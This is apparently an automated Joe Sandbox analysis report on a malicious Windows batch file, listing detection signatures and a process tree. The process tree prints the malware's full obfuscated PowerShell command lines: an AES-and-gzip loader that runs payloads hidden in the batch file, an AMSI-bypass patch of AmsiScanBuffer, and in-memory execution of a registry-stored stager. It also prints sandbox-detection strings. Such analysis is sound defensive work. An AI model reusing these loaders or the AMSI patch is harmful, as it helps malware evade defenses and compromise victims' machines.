Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.cmd

Overview

General Information

Sample name:1.cmd
Analysis ID:1525473
MD5:19fc666f7494d78a55d6b50a0252c214
SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Execute Batch Script
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 2120 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 5924 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 5968 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3808 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 2596 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 1284 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 732 cmdline: C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 2088 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5216 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 1712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 4192 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 4336 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 6808 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 6856 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 4284 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 4828 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 412 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 3904 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 4556 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 2852 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 3804 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 6048 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 2844 cmdline: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 5500 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1284INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2e561a:$b2: ::FromBase64String(
  • 0x2e5678:$b2: ::FromBase64String(
  • 0x35e0c7:$b2: ::FromBase64String(
  • 0x35f549:$b2: ::FromBase64String(
  • 0x379fe1:$b2: ::FromBase64String(
  • 0x37a03f:$b2: ::FromBase64String(
  • 0x37aad2:$b2: ::FromBase64String(
  • 0x37ab30:$b2: ::FromBase64String(
  • 0x4048b9:$b2: ::FromBase64String(
  • 0x404917:$b2: ::FromBase64String(
  • 0x2de4f2:$s1: -join
  • 0x46128e:$s1: -join
  • 0x46bc12:$s1: -join
  • 0x4784b7:$s1: -join
  • 0x48558c:$s1: -join
  • 0x48895e:$s1: -join
  • 0x489010:$s1: -join
  • 0x48ab01:$s1: -join
  • 0x48cd07:$s1: -join
  • 0x48d52e:$s1: -join
  • 0x48dd9e:$s1: -join
Process Memory Space: powershell.exe PID: 4828INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xf9c2:$b2: ::FromBase64String(
  • 0xfa20:$b2: ::FromBase64String(
  • 0x5d86d:$b2: ::FromBase64String(
  • 0x835c3:$b2: ::FromBase64String(
  • 0xcf15e:$b2: ::FromBase64String(
  • 0xcf1bc:$b2: ::FromBase64String(
  • 0x8bc3:$s1: -join
  • 0x955f1:$s1: -join
  • 0x97888:$s1: -join
  • 0x1eef:$s3: Reverse
  • 0xd5b5a:$s3: Reverse
  • 0x35f8:$s4: +=
  • 0x369a:$s4: +=
  • 0x6de2:$s4: +=
  • 0x8898:$s4: +=
  • 0x8aae:$s4: +=
  • 0x8ba5:$s4: +=
  • 0x91858:$s4: +=
  • 0x91877:$s4: +=
  • 0x918b2:$s4: +=
  • 0x918cf:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression 